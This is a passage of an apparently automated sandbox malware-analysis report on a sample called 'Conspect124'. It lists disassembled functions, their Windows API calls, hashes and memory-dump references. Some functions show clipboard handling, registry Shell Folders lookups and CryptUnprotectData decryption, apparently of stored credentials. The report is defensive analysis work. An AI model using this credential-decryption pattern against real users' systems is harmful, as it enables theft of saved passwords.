                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                      Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                      Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                      Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                      • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                      Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004095FC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                      • String ID:
                                      • API String ID: 3655998216-0
                                      • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                      • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                      Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00445426
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                      • String ID:
                                      • API String ID: 1828521557-0
                                      • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                      • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                      Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID:
                                      • API String ID: 2081463915-0
                                      • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                      • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                      Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateErrorHandleLastRead
                                      • String ID:
                                      • API String ID: 2136311172-0
                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                      Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@??3@
                                      • String ID:
                                      • API String ID: 1936579350-0
                                      • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                      • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                      Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                      Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                      Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                      • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                      • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                      • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                      Non-executed Functions

                                      Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EmptyClipboard.USER32 ref: 004098EC
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                      • GetLastError.KERNEL32 ref: 0040995D
                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                      • GetLastError.KERNEL32 ref: 00409974
                                      • CloseClipboard.USER32 ref: 0040997D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                      • String ID:
                                      • API String ID: 3604893535-0
                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                      Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadMessageProc
                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                      • API String ID: 2780580303-317687271
                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                      Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EmptyClipboard.USER32 ref: 00409882
                                      • wcslen.MSVCRT ref: 0040988F
                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                      • CloseClipboard.USER32 ref: 004098D7
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                      • String ID:
                                      • API String ID: 1213725291-0
                                      • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                      • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                      Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32 ref: 004182D7
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                      • LocalFree.KERNEL32(?), ref: 00418342
                                      • free.MSVCRT ref: 00418370
                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                      • String ID: OsError 0x%x (%u)
                                      • API String ID: 2360000266-2664311388
                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                      Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@??3@memcpymemset
                                      • String ID:
                                      • API String ID: 1865533344-0
                                      • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                      • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                      Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: NtdllProc_Window
                                      • String ID:
                                      • API String ID: 4255912815-0
                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                      Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsicmp.MSVCRT ref: 004022A6
                                      • _wcsicmp.MSVCRT ref: 004022D7
                                      • _wcsicmp.MSVCRT ref: 00402305
                                      • _wcsicmp.MSVCRT ref: 00402333
                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                      • memset.MSVCRT ref: 0040265F
                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                      Strings
